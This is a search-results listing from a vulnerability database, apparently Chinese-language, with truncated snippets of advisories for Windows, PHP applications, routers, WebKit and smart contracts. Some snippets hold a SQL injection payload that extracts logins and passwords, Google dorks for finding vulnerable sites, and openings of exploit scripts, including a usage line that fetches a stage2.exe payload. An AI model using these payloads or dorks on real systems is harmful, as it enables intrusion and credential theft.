56796 matches found
Microsoft Windows GDI AttemptWrite函数远程堆溢出漏洞(MS07-046)
BUGTRAQ ID: 25302 CVECAN ID: CVE-2007-3034 Microsoft Windows是微软发布的非常流行的操作系统。 Windows的图形设备接口(GDI)的GDI32函数AttemptWrite处理Windows元文件时可能会出现整数溢出,远程攻击者可能利用此漏洞提升自己的权限。 如下反汇编所示,很多GDI32 API函数都会调用AttemptWrite,如CreateMetaFileW。 77F4B519 mov esi, ebp+0Ch ; reported size of record in bytes ... ; user-controlle...
Coppermine Photo Gallery YABBSE.INC.PHP远程文件包含漏洞
Coppermine Photo Gallery是一款基于PHP的WEB应用程序。 Coppermine Photo Gallery不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'YABBSE.INC.PHP'脚本对用户提交的'sourcedir'参数缺少过滤,指定远程服务器上的任意文件作为包含对象,可导致以WEB权限执行任意PHP代码。 Coppermine Photo Gallery 1.4 Coppermine Photo Gallery 1.3.4 Coppermine Photo Gallery 1.3.3 Coppermine Photo...
IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability
No description provided by source. Site: http://indexscript.com Found By: xssvgamer Google Dork: allintext: "This site is powered by IndexScript" exploit: http://www.example.com/showcat.php?catid=-1 UNION ALL SELECT login,password FROM dirlogin / Blind SQL injection in indexscript.. Vul Code: "$s...
Joomla Component Pony Gallery <= 1.5 SQL Injection Vulnerability
No description provided by source. Title : Joomla Component Pony Gallery = 1.5 Remote Blind SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://joomlander.net $$ : Free Dork : inurl:"index.php?option=componygallery" DorkEx :...
Kaspersky Anti-Spam未授权目录访问验证绕过漏洞
Kaspersky Anti-Spam是一款反垃圾邮件应用程序。 Kaspersky Anti-Spam的WEB配置接口存在设计问题,远程攻击者可以利用漏洞未授权访问部分目录文件信息。 目前没有详细漏洞细节提供。 Kaspersky Anti-Spam 3.0 MP1 可采用如下补丁: Kaspersky Anti-Spam 3.0 MP1 Cuyahoga kas-3-3.0.274-0.i386.rpm http://dnl-us4.kaspersky-labs.com/products/release/english/antispam/rp...
Subversion修改属性远程信息泄露漏洞
Subversion是一款开放源码的多用户版本控制系统,支持非ASCII 文本和二进制数据。 Subversion在处理日志访问时存在漏洞,远程攻击者可能利用此漏洞获取敏感信息。 由于日志消息中可能会包含有关更改的详细信息,因此Subversion为用户访问指定的修改元数据设置了三级权限,分别为“完全访问”、“不可访问”和“部分访问”,其中设置为“部分访问”权限的用户仅可以看到svn:date和svn:author修改属性,以及changed-paths信息的路径(但不是信息)。 如果读者可以访问修改中所变更的所有路径,但不可以访问修改中所拷贝的所有路径,且使用svn propget、s...
PHP EXT/Session HTTP应答头注入漏洞
PHP是一款广泛使用的WEB开发脚本语言。 PHP的ext/session在置于会话COOKIE前没有URL编码会话ID,远程攻击者可以利用漏洞可以对会话COOKIE进行注入攻击。 当PHP' ext/session调用sessionstart,会在部分情况下发送新会话COOKIE,这些情况如下: - session id嵌入到PATHINFO - session id重生成 - session id通过sessionid设置 - sessionstart多次调用...
ProFTPD AUTH多个验证模块安全绕过漏洞
proftpd是一款流行的开放源代码的FTP服务程序。 proftpd在AUTH API上存在一个错误,远程攻击者可以利用漏洞可以绕过安全限制,未授权访问。 由于FTP协议需要分开USER和PASS命令,ProFTPD独立的通过USER对用户数据进行检查,而当PASS接收到时对用户的验证进行校验。因此这些组合使ProFTPD允许多个同步Auth模块存在如modauthunix, modsql, modldap,可能导致某个验证模块提供用户数据modauthunix而另一个模块验证用户数据如modsql. 当验证模块modsql配置成使用底限制的验证策略,如: SQLAuthTypes...
McAfee e-Business Server无效数据长度拒绝服务漏洞
McAfee e-Business Server用于为存储和共享文档的企业和个人提供透明加密。 McAfee e-Business Server在处理畸形的认证请求时存在漏洞,远程攻击者可能利用此漏洞导致服务器崩溃。 如果攻击者在认证到McAfee e-Business Server期间发送了畸形认证报文的话就会导致服务器崩溃。收到报文后服务器会读取其长度,然后试图从缓冲区读取该长度的字节。如果攻击者能够指定很大的长度值但发送了很小的报文,就会导致服务器读取到所映射堆内存之外,触发无法处理的异常,管理服务器会崩溃。 0 McAfee E-Business Server 8.5.1.101...
Xoops Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit
No description provided by source. html head titleXOOPS Module XFsection = 1.07 articleid BLIND SQL Injection Exploit/title script type="text/javascript" //'=============================================================================================== //'Script Name: XOOPS Module XFsection = 1.0...
Xoops Module Repository (viewcat.php) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl Script Name: XOOPS Module Repository viewcat.php BLIND SQL Injection Exploit Coded by : ajann Author : ajann Dork : "inurl:/modules/repository/" Contact : : S.Page : http://www.xoops.org/ $$ : ?? . : Tested on xoops.org and xoops.pr.gov.br .. :...
Softerra Time-Assistant <= 6.2 (inc_dir) Remote File Inclusion Vuln
No description provided by source. \ /\ / | \ | / // / | | \ \ Y / | / / \ /\| /\ / / / / / .OR.ID ECHOADV80$2007 ----------------------------------------------------------------------------------------- ECHOADV80$2007 Softerra Time-Assistant = 6.2 incdir Remote File Inclusion Vulnerability...
sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit
No description provided by source. !/usr/bin/perl sBLOG 0.7.3 Betainc/lang.phpLocal File Inclusion Exploit D.Script: http://sourceforge.net/projects/sblog/ V.Code: ifisset$conflangdefault && fileexists'lang/' . $conflangdefault . '.php' require'lang/' . $conflangdefault . '.php'; Discovered...
PHP Session.Save_Path() TMPDIR Open_Basedir限制绕过漏洞
PHP是一款广泛使用的WEB开发脚本语言。 PHP session.savepath存在openbasedir绕过问题,远程攻击者可能利用此漏洞结合其他漏洞进行进一步攻击,如包含文件。 当提供空会话保存路径时,文件会话存储模块通过TMPDIR环境变量指定回调的路径,不幸的是回调发生在openbasedir检查之后,可导致安全检查被绕过。进行其他进一步攻击。 PHP PHP 5.2.1 PHP PHP 5.1.6 PHP PHP 5.1.5 PHP PHP 5.1.4 PHP PHP 5.1.3 PHP PHP 5.1.3 PHP PHP 5.1.2 PHP PHP 5.1.1 PHP P...
Active Link Engine (default.asp catid) Remote SQL Injection Vulnerability
No description provided by source. Title : Active Link Engine Remote SQL Injection Vulnerability Author : CyberGhost My Web Site : http://aspspider.org/cgsecurity Demo Page : http://www.activewebsoftwares.com/demoactivelinkengine Script Page :...
WORK system e-commerce <= 3.0.5 Remote File Inclusion Vulnerability
No description provided by source. Rodrigo Duarte WuefezAT2die4.com ;D WORK system e-commerce: WORK PHP,Mysql content management system CMS e-commerce or not : ajax, workflow, content,package,language,currency,country,price,stock,group user,CSS,banner,logo,...
迅雷5 ThunderAgent Module 远程拒绝服务漏洞
迅雷是由Thunder Networking公司开发的一个下载软件,在中国有着非常广泛的用户。迅雷5的ThunderAgent005.dll中注册了一个 activex控件,当Internet Explorer调用他的某些方法时,将会造成整数溢出,成功利用将造成Internet Explorer崩溃。 在ThunderAgent005.dll中,有两处方法调用时忽略了输入参数异常的情况,当输入参数为精心构造的负数或大整数时,将造成整数溢出,产生不可预料的结果,从而造成浏览器崩溃。 该Activex注册控件的Object Classid是...
GNU Wget FTP_Syst函数远程拒绝服务漏洞
GNU Wget是一款流行的多协议文件获取应用程序。 GNU Wget FTPSyst函数存在问题,远程攻击者可利用此漏洞对应用程序进行拒绝服务攻击。 目前没有详细漏洞细节提供。 GNU wget 1.10.2 GNU wget 1.10.1 GNU wget 1.10 GNU wget 1.9.1 + MandrakeSoft Corporate Server 3.0 x8664 + MandrakeSoft Corporate Server 3.0 + MandrakeSoft Linux Mandrake 10.2 x8664 + MandrakeSoft Linux Mandra...
Tiny Web图库图象参数远程文件包含漏洞
Tiny Web Gallery是一款基于PHP的图库程序。 Tiny Web Gallery不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是\'image.php\'、\'image.php2\'脚本对用户提交的\'image\'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 Tiny Web Gallery 1.5 http://www.tinywebgallery.com/en/index.htm...
JustSystems多个产品缓冲区溢出漏洞
JustSystems是日本的一家软件公司,产品包括多种日文输入和处理工具。 JustSystems的多个产品中存在缓冲区溢出漏洞,如果用户受骗打开了特制文档的话,就会触发这个溢出,导致执行任意指令。 JustSystems Ichitaro viewer 4.0 JustSystems Ichitaro 2005 JustSystems Ichitaro 2004 JustSystems Hanako viewer 1.0 JustSystems Hanako 2006 JustSystems Hanako 2005 JustSystems Hanako 2004 JustSystem...
Mambo Remository Component <= 3.25 Remote Include Vulnerability
No description provided by source. .: insecurity research team :. ....:...:. . .:. | |/ :/ // :/ .:. : | | | \\ /\ / :. . ..: ||| / \ \ .: .:.. .. ./ .:/:. ./. .:/: . ...:. .advisory. .:... :..................: o9.o8.2oo6 .. Affected Application: Remository v3.25 Mambo/Joomla CMS Component...
NetBSD多个本地信息泄露漏洞
NetBSD是一款开放源代码的操作系统。 NetBSD在返回内核内存到用户空间时缺少过滤,本地攻击者可以利用漏洞获得内核敏感信息。 目前没有详细漏洞细节提供。 NetBSD NetBSD 3.0.1 NetBSD NetBSD 3.0 NetBSD NetBSD 2.1 NetBSD NetBSD 2.0.3 NetBSD NetBSD 2.0.2 NetBSD NetBSD 2.0.1 NetBSD NetBSD 2.0 NetBSD NetBSD Current NetBSD NetBSD 3,1RC1 NetBSD NetBSD 2.1.1 NetBSD NetBSD 2.0.4...
Microsoft Windows 2000内核本地权限提升漏洞(MS06-049)
Microsoft Windows是微软发布的非常流行的操作系统。 本地攻击者可以利用Microsoft Windows 2000内核中未检查的缓冲区获得权限提升,完全控制受影响的系统。 Microsoft Windows 2000SP4 Microsoft已经为此发布了一个安全公告(MS06-049)以及相应补丁: MS06-049:Vulnerability in Windows Kernel Could Result in Elevation of Privilege 920958...
Microsoft Outlook Web Access 'owalogon.asp' URL重定向漏洞
Microsoft Exchange Server是一款企业级的邮件服务程序。 Microsoft Outlook Web Access在处理URL时存在问题,远程攻击者可以利用这个漏洞重定向任意URL。 通过构建特殊URL,攻击者可以使用户重定向到任意URL,攻击者利用这个漏洞可以诱使用户访问某个页面,并可能记录密码并发送,或者下载任意文件等。 Microsoft Outlook 2003 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.microsoft.com/technet/security/ Donnie...
MS Windows WebDAV Remote PoC Exploit
No description provided by source. // / IIS 5.0 WebDAV -Proof of concept- / / Bug: CAN-2003-0109 / / By Roman Medina-Heigl Hernandez / / aka RoMaNSoFt [email protected] / / Madrid, 23.Mar.2003 / / ================================= / / Public release. Version 1. / / -------------------------------...
Linux Kernel ZLib无效内存访问本地拒绝服务漏洞
BUGTRAQ ID: 14719 CVECAN ID: CAN-2005-2458 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel的zlib例程的inflate.c中存在漏洞。如果用户打开了特制的压缩文件的话,就可能导致kernel崩溃。 Linux kernel 2.6.12.5 Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: Linux linux-2.6.12.5.tar.gz...
MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)
No description provided by source. !/bin/sh - "exec" "python" "-O" "$0" "$@" doc = """BL4CK - MS06-014 RDS.DataStore - Data Execution CVS-2006-0003 MS06-014 April 2006 this is a bit out-dated, but works very well Usage: ./bl4ckms06014.py http://omfg.what.ho.st/user/stage2.exe index.html Now uploa...
Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit
No description provided by source. // / Local r00t Exploit for: / / Linux Kernel PRCTL Core Dump Handling / / BID 18874 / CVE-2006-2451 / / Kernel 2.6.x = 2.6.13 && 2.6.17.4 / / By: / / - dreyer [email protected] main PoC code / / - RoMaNSoFt [email protected] local root code / / 10.Jul.2006 / //...
Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability
No description provided by source. NukedX Security Advisory Nr 2006-29 ClanSys v1.1 index.php page PHP Code Insertion Vulnerability Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=29...
New burnOverflow Bug Identified in Multiple ERC20 Smart Contracts (CVE-2018-11239)
Our vulnerability-scanning system at PeckShield has so far discovered several dangerous smart contract vulnerabilities batchOverflow1, proxyOverflow2, transferFlaw3, ownerAnyone4, multiOverflow5. Some of them could be used by attackers to generate tokens out of nowhere while others can be used to...
New multiOverflow Bug Identified in Multiple ERC20 Smart Contracts (CVE-2018-10706)
Our vulnerability-scanning system at PeckShield has so far discovered several dangerous smart contract vulnerabilities batchOverflow, proxyOverflow, transferFlaw, ownerAnyone. Some of them could be used by attackers to generate tokens out of nowhere while others can be used to steal tokens from...
DJI Spark hijacking
It is no pleasant experience at all for anyone to get the valuable property bought with the money you have earned with your blood, sweat, and tears stolen by some unknown cybercriminal. The Internet of Things IoT is developing with the rapid pace, and the devices that can be controlled remotely...
CloudMe Unauthenticated Remote Buffer Overflow(CVE-2018-6892)
The following advisory describes one 1 vulnerability found in CloudMe. CloudMe is “a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. It features a blue folder that appears on all devices with the same content, all files are...
OpenNMS Java Object Deserialization RCE
! /usr/bin/env python3 Credits: http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/opennms nessus/plugins/opennmsjavaserialize.nasl cobbled together by pancho import socket import sys def buildcmd:...
Asus Unauthenticated LAN Remote Command Execution
Vulnerabilities Summary The following advisory describes two 2 vulnerabilities found in AsusWRT Version 3.0.0.4.380.7743. The combination of the vulnerabilities leads to LAN remote command execution on any Asus router. AsusWRT is “THE POWERFUL USER-FRIENDLY INTERFACE – The enhanced ASUSWRT...
Telesquare SKT LTE Router SDT-CS3B1 Remote Reboot Denial Of Service
Summary We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G LTE wireless communication based LTE router product. Description The router suffers from an unauthenticated reboot command execution. Attackers can exploit this issue to cause a denial of service scenario. /lte/lteuicc.shtml: 858:...
libxls read_MSAT Code Execution Vulnerability(CVE-2017-2897)
Summary An exploitable out-of-bounds write vulnerability exists in the readMSAT function of libxls 1.4. A specially crafted XLS file can cause a memory corruption resulting in remote code execution. An attacker can send malicious XLS file to trigger this vulnerability. Tested Versions libxls 1.4...
Microsoft IE11: use-after-free in jscript!JsErrorToString(CVE-2017-11810)
There is a use-after-free in jscript.dll library that can be exploited in IE11. jscript.dll is an old JavaScript library that was used in IE 8 and back. However, IE11 can still load it if put into IE8 compatibility mode and if there is a script tag that can only be understood by the older library...
Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service(CVE-2017-2909)
Summary An infinite loop programming error exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over network to trigger this vulnerability...
Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution(CVE-2017-2894)
Summary An exploitable stack buffer overflow vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT...
Ruby TclTkIp ip_cancel_eval Type Confusion Vulnerabilities(CVE-2016-2337)
DESCRIPTION Type Confusion exists in canceleval Ruby's TclTkIp class method. Attacker passing different type of object than String as "retval" argument can cause arbitrary code execution. TESTED VERSIONS Ruby 2.3.0 dev Ruby 2.2.2 Tcl/Tk8.6 or later PRODUCT URLs https://www.ruby-lang.org DETAILS...
Microsoft Windows Kernel Local Information Disclosure Vulnerability(CVE-2017-11817)
This tracker entry is a fork of issue 1325, which this bug was reported as a part of. However, as some essential information and context was provided in issue 1325, the "Reported" date was adjusted there to account for it. The new information did not concern the vulnerability discussed here, so w...
Libbpg BGP image decoding Code Execution Vulnerability(CVE-2016-8710)
Summary An exploitable heap write out of bounds vulnerability exists in the decoding of BPG images in libbpg library. A crafted BPG image decoded by libbpg can cause an integer underflow vulnerability causing an out of bounds heap write leading to remote code execution. This vulnerability can be...
WebKit: heap-buffer-overflow in WebCore::RenderSearchField::addSearchResult(CVE-2017-7049)
There is a heap buffer overflow in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= function go i.value = "1"; i.type = "search"; f.submit;...
Microsoft Windows Uniscribe Information Disclosure Vulnerability(CVE-2017-0284)
We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!ttoGetTableData function, while trying to display text using a corrupted TTF font file: --- 210.274: Access violation - code c0000005 first chance First chance exceptions are reported before any exception handlin...
Apple iOS / MacOS Netagent Kernel Memory Disclosure(CVE-2017-2507)
iOS/MacOS kernel memory disclosure due to lack of bounds checking in netagent socket option handling netagentctlsetopt is the setsockopt handler for netagent control sockets. Options of type NETAGENTOPTIONTYPEREGISTER are handled by netagenthandleregistersetopt. Here's the code: static errnot...
WebKit: UXSS through HTMLObjectElement::updateWidget(CVE-2017-2493)
When an object element loads a JavaScript URLe.g., javascript:alert1, it checks whether it violate the Same Origin Policy or not. Here's some snippets of the logic. void HTMLObjectElement::updateWidgetCreatePlugins createPlugins ... String url = this-url; ... if !allowedToLoadFrameURLurl return;...
Windows Kernel win32k.sys multiple bugs in the NtGdiGetDIBitsInternal system call (CVE-2017-0058)
We have discovered two bugs in the implementation of the win32k!NtGdiGetDIBitsInternal system call, which is a part of the graphic subsystem in all modern versions of Windows. The issues can potentially lead to kernel pool memory disclosure bug 1 or denial of service bug 1 and 2. Under certain...
MacOS/iOS kernel uaf due to bad locking in necp_open (CVE-2017-2478)
necpopen is a syscall used to obtain a new necp file descriptor The necp file's fp's fgdata points to a struct necpfddata allocated on the heap. Here's the relevant code from necpopen: error = fallocp, &fp, &fd, vfscontextcurrent; --------------------- a if error != 0 goto done; if fddata =...
Huawei Flybox B660 Router to bypass authentication vulnerability
Huawei Flybox B660 Router to bypass authentication vulnerability Huawei Flybox B660 Router router device exists to bypass authentication vulnerability. Due to local path"./ htmlcode/html/"module and"indexdefault. asp"file exists vulnerability, a remote unauthenticated attacker could exploit the...